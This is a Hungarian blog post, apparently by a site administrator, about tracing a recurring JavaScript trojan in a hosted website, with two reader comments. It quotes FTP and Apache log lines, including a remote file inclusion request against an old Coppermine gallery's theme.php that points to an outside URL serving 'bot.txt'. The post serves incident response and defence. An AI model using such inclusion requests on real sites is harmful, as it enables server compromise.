Trójai támadás

Trójai falóHatározottam nem kedvelem ha valaki belepiszkál a szerverünkbe. Az egyik karbantartott honlapunk bekapott egy trójait amit kb egy hete gyorsan le is irtottam. Ma reggelre viszont visszamászott a kis piszok.
Hát igen, a Linuxnak az egyik nagy hátránya, hogy az ember könnyen elfeledkezik arról, hogy mik is azok a vírusok. Szerencsére van a világnak egy olyan része amely időnként azért emlékeztetnek rá.

A sztori úgy indult, hogy az egyik honlap gazdája szólt, hogy a NOD trójai fertőzést jelez a weblapjukon. Szerencsére csinált egy képernyőképet a NOD figyelmeztető ablakáról amin látni lehetett, hogy a kis huncut a JS/TrojanDownloader.Small.NBF trojan névre hallgat.

Rákeresgéltem a neten, és megtaláltam, hogy a a trójai a html kódba generálódik egy rakás újsorral a <html> tag után. Kivettem, örültem. Mivel az oldal webmestere már produkált néhány problémát különösebben nem keresgéltem, hogy hogyan került oda a kód.

Ma reggel a trójai újra megjelent. Megnéztem és a szóban forgó trójait tartalmazó fájlt október 22-én 22:02-kor módosították utoljára. Kicsit kutakodtam az apache logban az időszakra vonatkozóan, de semmi.

Fogtam a /var/log/messages-t és ezt találtam benne:

Oct 22 22:01:44 lal proftpd[27597]: 69.61.75.20 (58.65.234.164[58.65.234.164]) - FTP session opened.
Oct 22 22:01:45 lal PAM_pwdb[27597]: (ftp) session opened for user pecs by (uid=0)
Oct 22 22:02:27 lal proftpd[27597]: 69.61.75.20 (58.65.234.164[58.65.234.164]) - PAM(setcred): System error
Oct 22 22:02:27 lal proftpd[27597]: 69.61.75.20 (58.65.234.164[58.65.234.164]) - PAM(close_session): System error
Oct 22 22:02:27 lal proftpd[27597]: 69.61.75.20 (58.65.234.164[58.65.234.164]) - FTP session closed.

Persze nem kérdés, hogy az adott időpontban senkinek sem kellett volna egy hong-kongi címről ftp kapcsolatot kezdeményezni.

Gyors jelszócsere, a megtámadott fájl jogát 644-ről 444-re módosítottam. A trójait eltettem magamnak néha egész jól lehet tanulni belőlük, hogy mire kell odafigyelni.

Megírtam az eseményeket a rendszergazdának, elküldtem neki a trójait és reméltem, hogy hátha taál még valami plusz információt.

Talált is.

216.55.149.41 - - [22/Oct/2008:13:10:22 -0400] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.jigangdoyo.com/php/bot.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
216.55.149.41 - - [22/Oct/2008:13:10:22 -0400] "GET /galery//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.jigangdoyo.com/php/bot.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"

Bumm! A Coppermine-nal volt már egy pár kalandom, gyanús is volt, hogy ez lesz a dologban. Alaposan oda kell rá figyelni, mivel praktikusan minden frissítés foltoz valami lyukat. Persze a szóban forgó lap galériája egy meglehetősen régi verziót futtat így könnyebb volt a behatolónak utat találnia.

A tanulság, hogy figyeljünk a frissítésekre ha már a user nem teszi.

3 thoughts on “Trójai támadás

  1. Hi

    Az egyik frewebes oldalamon nekem is ez a vírus van. Érdekes kis dög, töröltem a szerverről azt a fájlt amiben volt. Majd felmásoltam egy tisztát, és ha ujra behoztam a weblapot akkor megint benne volt.
    Mit lehetne vele csinálni?

  2. Mr-Pamacs: Ez azt jelenti, hogy a szerveren fut egy script ami felülírja mindig a fájlodat. Tedd írásvédetté mindenki számára. Freeweben a logokhoz nem fogsz hozzáférni gondolom, szóval nem fogod könnyen megtalálni, hogy mi a script ami beleír. Mindenesetre az egész szerver korrumpálható vele, szóval érdemes a freewebnek írni róla egy mailt.

Vélemény, hozzászólás?

Az email címet nem tesszük közzé. A kötelező mezőket * karakterrel jelöljük.